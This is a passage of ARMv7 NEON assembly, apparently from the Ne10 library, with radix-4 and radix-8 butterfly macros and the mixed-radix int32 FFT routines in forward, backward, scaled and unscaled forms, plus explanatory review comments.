vadd.s32 d_out3_r37, d_s1_r2, d_s3_i2
vsub.s32 d_out3_i37, d_s1_i2, d_s3_r2
.else
vadd.s32 d_out1_r15, d_s1_r2, d_s3_i2
vsub.s32 d_out1_i15, d_s1_i2, d_s3_r2
vsub.s32 d_out3_r37, d_s1_r2, d_s3_i2
vadd.s32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.endif
/* transpose pairs so consecutive outputs are contiguous, then store */
vtrn.32 q_out0_2, q_out1_2
vtrn.32 q_out2_2, q_out3_2
vst2.32 {q_out0_2}, [p_tmp]!
vst2.32 {q_out2_2}, [p_tmp]!
vst2.32 {q_out1_2}, [p_tmp]!
vst2.32 {q_out3_2}, [p_tmp]!
.endm
/*
 * BUTTERFLY4X2_WITH_TWIDDLES scaled_flag, inverse
 *
 * ARMv7 NEON radix-4 butterfly with Q31 twiddle multiplication for the
 * later stages of the int32 FFT, two complex values per leg.  Complex
 * products are built with vmull/vmlal/vmlsl into 64-bit accumulators and
 * narrowed back with vrshrn #31 (rounded Q31).  \scaled_flag == "TRUE"
 * halves each radix-2 combine via vhadd/vhsub to avoid overflow;
 * \inverse conjugates the twiddles and flips the j-rotation sign.
 * On entry the current data/twiddles are in q_fin0..q_fin3 / d_tw*;
 * the macro rewinds p_in1/p_tw1 to the next column, reloads during the
 * multiplies, stores through p_out1 (stride mstep), then rewinds p_out1
 * by 4*mstep and advances it 16 B.
 */
.macro BUTTERFLY4X2_WITH_TWIDDLES scaled_flag, inverse
/* step input/twiddle pointers back to the start of the next column */
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #16
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #16
/* keep leg 0 (q_fin0 is overwritten by the reload below) */
vmov q_scr0, q_fin0
/* Q31 complex multiply: real-part products into 64-bit accumulators */
vmull.s32 q_scr1_r, d_fin1_r, d_tw0_r
vmull.s32 q_scr1_i, d_fin1_i, d_tw0_r
vmull.s32 q_scr2_r, d_fin2_r, d_tw1_r
vmull.s32 q_scr2_i, d_fin2_i, d_tw1_r
vmull.s32 q_scr3_r, d_fin3_r, d_tw2_r
vmull.s32 q_scr3_i, d_fin3_i, d_tw2_r
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
.ifeqs "\inverse", "TRUE"
/* accumulate with conjugated twiddles; reloads interleaved for latency */
vmlal.s32 q_scr1_r, d_fin1_i, d_tw0_i
vmlsl.s32 q_scr1_i, d_fin1_r, d_tw0_i
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlal.s32 q_scr2_r, d_fin2_i, d_tw1_i
vmlsl.s32 q_scr2_i, d_fin2_r, d_tw1_i
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlal.s32 q_scr3_r, d_fin3_i, d_tw2_i
vmlsl.s32 q_scr3_i, d_fin3_r, d_tw2_i
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.else
/* accumulate with plain twiddles */
vmlsl.s32 q_scr1_r, d_fin1_i, d_tw0_i
vmlal.s32 q_scr1_i, d_fin1_r, d_tw0_i
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlsl.s32 q_scr2_r, d_fin2_i, d_tw1_i
vmlal.s32 q_scr2_i, d_fin2_r, d_tw1_i
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlsl.s32 q_scr3_r, d_fin3_i, d_tw2_i
vmlal.s32 q_scr3_i, d_fin3_r, d_tw2_i
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.endif
/* narrow Q62 products back to Q31 with rounding */
vrshrn.i64 d_scr1_r, q_scr1_r, #31
vrshrn.i64 d_scr1_i, q_scr1_i, #31
vrshrn.i64 d_scr2_r, q_scr2_r, #31
vrshrn.i64 d_scr2_i, q_scr2_i, #31
vrshrn.i64 d_scr3_r, q_scr3_r, #31
vrshrn.i64 d_scr3_i, q_scr3_i, #31
.ifeqs "\scaled_flag", "TRUE"
/* scaled radix-4 combine: halving add/sub at every step */
vhadd.s32 q_scr4, q_scr0, q_scr2
vhsub.s32 q_scr5, q_scr0, q_scr2
vhadd.s32 q_scr6, q_scr1, q_scr3
vhsub.s32 q_scr7, q_scr1, q_scr3
vhadd.s32 q_fout0, q_scr4, q_scr6
vhsub.s32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vhsub.s32 d_fout1_r, d_scr5_r, d_scr7_i
vhadd.s32 d_fout1_i, d_scr5_i, d_scr7_r
vhadd.s32 d_fout3_r, d_scr5_r, d_scr7_i
vhsub.s32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vhadd.s32 d_fout1_r, d_scr5_r, d_scr7_i
vhsub.s32 d_fout1_i, d_scr5_i, d_scr7_r
vhsub.s32 d_fout3_r, d_scr5_r, d_scr7_i
vhadd.s32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.else
/* unscaled radix-4 combine */
vadd.s32 q_scr4, q_scr0, q_scr2
vsub.s32 q_scr5, q_scr0, q_scr2
vadd.s32 q_scr6, q_scr1, q_scr3
vsub.s32 q_scr7, q_scr1, q_scr3
vadd.s32 q_fout0, q_scr4, q_scr6
vsub.s32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.s32 d_fout1_r, d_scr5_r, d_scr7_i
vadd.s32 d_fout1_i, d_scr5_i, d_scr7_r
vadd.s32 d_fout3_r, d_scr5_r, d_scr7_i
vsub.s32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.s32 d_fout1_r, d_scr5_r, d_scr7_i
vsub.s32 d_fout1_i, d_scr5_i, d_scr7_r
vsub.s32 d_fout3_r, d_scr5_r, d_scr7_i
vadd.s32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.endif
vst2.32 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.32 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.32 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.32 {d_fout3_r, d_fout3_i}, [p_out1], mstep
/* rewind the output pointer and move to the next 16-B group */
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #16
.endm
.macro BUTTERFLY8X2_WITHOUT_TWIDDLES scaled_flag, inverse
/**
* Radix-8 butterfly, two complex int32 lanes per iteration, with no stage
* twiddle multiplications (used only for the first FFT stage, where all
* stage twiddles are 1).
*
* \scaled_flag: "TRUE" pre-shifts every input right by 3 (i.e. divides by 8)
* so the fixed-point additions below cannot overflow (scaled variants).
* \inverse: "TRUE" mirrors the signs of the +/-j rotations for the
* backward (inverse) transform.
*
* Register contents after the interleaved loads below:
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
// tmp0 = address of the Q31 +/-sqrt(2)/2 constants (.L_TW_81_32): the
// 45-degree rotations that are intrinsic to a radix-8 butterfly
adr tmp0, .L_TW_81_32
// de-interleaving loads: _r parts in one d-reg, _i parts in the other
vld2.32 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.32 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.32 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.32 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.32 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.32 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.32 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.32 {d_in7_r, d_in7_i}, [p_in1:64], fstep
.ifeqs "\scaled_flag", "TRUE"
// scale inputs by 1/8 up front so the three add/sub levels below cannot wrap
vshr.s32 q_in0, q_in0, 3
vshr.s32 q_in2, q_in2, 3
vshr.s32 q_in4, q_in4, 3
vshr.s32 q_in6, q_in6, 3
vshr.s32 q_in1, q_in1, 3
vshr.s32 q_in3, q_in3, 3
vshr.s32 q_in5, q_in5, 3
vshr.s32 q_in7, q_in7, 3
.endif
// radix 4 butterfly without twiddles
vadd.s32 q_sin0, q_in0, q_in1
vsub.s32 q_sin1, q_in0, q_in1
// load the two Q31 sqrt(2)/2 constants while the adds issue
vld1.32 {d_tw_twn}, [tmp0]
vadd.s32 q_sin2, q_in2, q_in3
vsub.s32 q_sin3, q_in2, q_in3
vadd.s32 q_sin4, q_in4, q_in5
vsub.s32 q_sin5, q_in4, q_in5
vadd.s32 q_sin6, q_in6, q_in7
vsub.s32 q_sin7, q_in6, q_in7
// apply the fixed 45/135-degree rotations; sign pattern flips for inverse
.ifeqs "\inverse", "TRUE"
vneg.s32 d_sin5_i, d_sin5_i
vsub.s32 d_s3_r, d_sin3_r, d_sin3_i
vadd.s32 d_s3_i, d_sin3_i, d_sin3_r
vadd.s32 d_s7_r, d_sin7_r, d_sin7_i
vsub.s32 d_s7_i, d_sin7_i, d_sin7_r
.else
vneg.s32 d_sin5_r, d_sin5_r
vadd.s32 d_s3_r, d_sin3_r, d_sin3_i
vsub.s32 d_s3_i, d_sin3_i, d_sin3_r
vsub.s32 d_s7_r, d_sin7_r, d_sin7_i
vadd.s32 d_s7_i, d_sin7_i, d_sin7_r
.endif
// swap re/im of sin5: together with the vneg above this is the *(-/+j) term
vswp d_sin5_r, d_sin5_i
// scale s3/s7 by sqrt(2)/2 (Q31 doubling-multiply keeps Q31 format)
vqdmulh.s32 q_s3, q_s3, d_tw_twn[0]
vqdmulh.s32 q_s7, q_s7, d_tw_twn[1]
// radix 2 butterfly
vadd.s32 q_s8, q_sin0, q_sin4
vadd.s32 q_s9, q_sin1, q_sin5
vsub.s32 q_s10, q_sin0, q_sin4
vsub.s32 q_s11, q_sin1, q_sin5
// radix 2 butterfly
vadd.s32 q_s12, q_sin2, q_sin6
vadd.s32 q_s13, q_s3, q_s7
vsub.s32 q_s14, q_sin2, q_sin6
vsub.s32 q_s15, q_s3, q_s7
vsub.s32 q_out4, q_s8, q_s12
vsub.s32 q_out5, q_s9, q_s13
vadd.s32 q_out0, q_s8, q_s12
vadd.s32 q_out1, q_s9, q_s13
// final combine; +/-j rotation sign depends on transform direction
.ifeqs "\inverse", "TRUE"
vsub.s32 d_out2_r, d_s10_r, d_s14_i
vadd.s32 d_out2_i, d_s10_i, d_s14_r
vsub.s32 d_out3_r, d_s11_r, d_s15_i
vadd.s32 d_out3_i, d_s11_i, d_s15_r
vadd.s32 d_out6_r, d_s10_r, d_s14_i
vsub.s32 d_out6_i, d_s10_i, d_s14_r
vadd.s32 d_out7_r, d_s11_r, d_s15_i
vsub.s32 d_out7_i, d_s11_i, d_s15_r
.else
vadd.s32 d_out2_r, d_s10_r, d_s14_i
vsub.s32 d_out2_i, d_s10_i, d_s14_r
vadd.s32 d_out3_r, d_s11_r, d_s15_i
vsub.s32 d_out3_i, d_s11_i, d_s15_r
vsub.s32 d_out6_r, d_s10_r, d_s14_i
vadd.s32 d_out6_i, d_s10_i, d_s14_r
vsub.s32 d_out7_r, d_s11_r, d_s15_i
vadd.s32 d_out7_i, d_s11_i, d_s15_r
.endif
// transpose pairs so the two lanes come out in consecutive-sample order
vtrn.32 q_out0, q_out1
vtrn.32 q_out2, q_out3
vtrn.32 q_out4, q_out5
vtrn.32 q_out6, q_out7
vst2.32 {q_out0}, [p_out1]!
vst2.32 {q_out2}, [p_out1]!
vst2.32 {q_out4}, [p_out1]!
vst2.32 {q_out6}, [p_out1]!
vst2.32 {q_out1}, [p_out1]!
vst2.32 {q_out3}, [p_out1]!
vst2.32 {q_out5}, [p_out1]!
vst2.32 {q_out7}, [p_out1]!
// rewind the 8 post-incremented loads, then step to the next 2-sample column
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #16
.endm
.align 4
/* Q31 constants +sqrt(2)/2 and -sqrt(2)/2 (1518500249 = round(0.70710678 *
 * 2^31)): the 45-degree twiddles loaded by BUTTERFLY8X2_WITHOUT_TWIDDLES. */
.L_TW_81_32:
.long 1518500249
.long -1518500249
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*
* NOTE(review): p_fout/p_fin/p_factors/p_twiddles etc. are .req register
* aliases declared in this file's preamble (presumably r0-r3 in argument
* order -- confirm against the alias block). A 5th, stack-passed argument
* is the scratch buffer used to ping-pong between stages; it is read at
* [sp, #104] after the prologue (40 B of GPRs + 64 B of q4-q7 pushed).
*/
.align 4
.global ne10_mixed_radix_fft_forward_int32_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int32_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_unscaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs count, count, #2 /* two complex samples per butterfly iteration */
bgt .L_ne10_radix4_butterfly_unscaled_first_stage_fstride
/* swap input/output buffer */
/* tmp0 = 5th (stack) argument: scratch buffer; 104 = 40 B GPRs + 64 B q4-q7 */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3 /* nstep = fstride * 8 bytes (one complex int32) */
lsr fstride, fstride, #2
b .L_ne10_butterfly_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_unscaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_unscaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_unscaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (f index)*mstride*4 elements */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2 /* next stage: mstride *= 4, fstride /= 4 */
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* last stage writes to the saved original Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int32_unscaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*
* Identical structure to the forward unscaled variant; only the butterfly
* macros are invoked with inverse="TRUE" (conjugated rotations).
* NOTE(review): p_fout/p_fin/p_factors/p_twiddles are .req aliases from the
* file preamble; the 5th (stack) argument is the inter-stage scratch buffer
* read at [sp, #104] (40 B of GPRs + 64 B of q4-q7 pushed below it).
*/
.align 4
.global ne10_mixed_radix_fft_backward_int32_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int32_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs count, count, #2 /* two complex samples per butterfly iteration */
bgt .L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride
/* swap input/output buffer */
/* tmp0 = 5th (stack) argument: scratch buffer; 104 = 40 B GPRs + 64 B q4-q7 */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3 /* nstep = fstride * 8 bytes (one complex int32) */
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_unscaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (f index)*mstride*4 elements */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2 /* next stage: mstride *= 4, fstride /= 4 */
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* last stage writes to the saved original Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int32_unscaled_neon */
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*
* Scaled variant: butterfly macros are invoked with scaled_flag="TRUE" so
* inputs are pre-shifted each stage to avoid fixed-point overflow.
* NOTE(review): p_fout/p_fin/p_factors/p_twiddles are .req aliases from the
* file preamble; the 5th (stack) argument is the inter-stage scratch buffer
* read at [sp, #104] (40 B of GPRs + 64 B of q4-q7 pushed below it).
*/
.align 4
.global ne10_mixed_radix_fft_forward_int32_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int32_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_scaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs count, count, #2 /* two complex samples per butterfly iteration */
bgt .L_ne10_radix4_butterfly_scaled_first_stage_fstride
/* swap input/output buffer */
/* tmp0 = 5th (stack) argument: scratch buffer; 104 = 40 B GPRs + 64 B q4-q7 */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3 /* nstep = fstride * 8 bytes (one complex int32) */
lsr fstride, fstride, #2
b .L_ne10_butterfly_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_scaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_scaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_scaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (f index)*mstride*4 elements */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
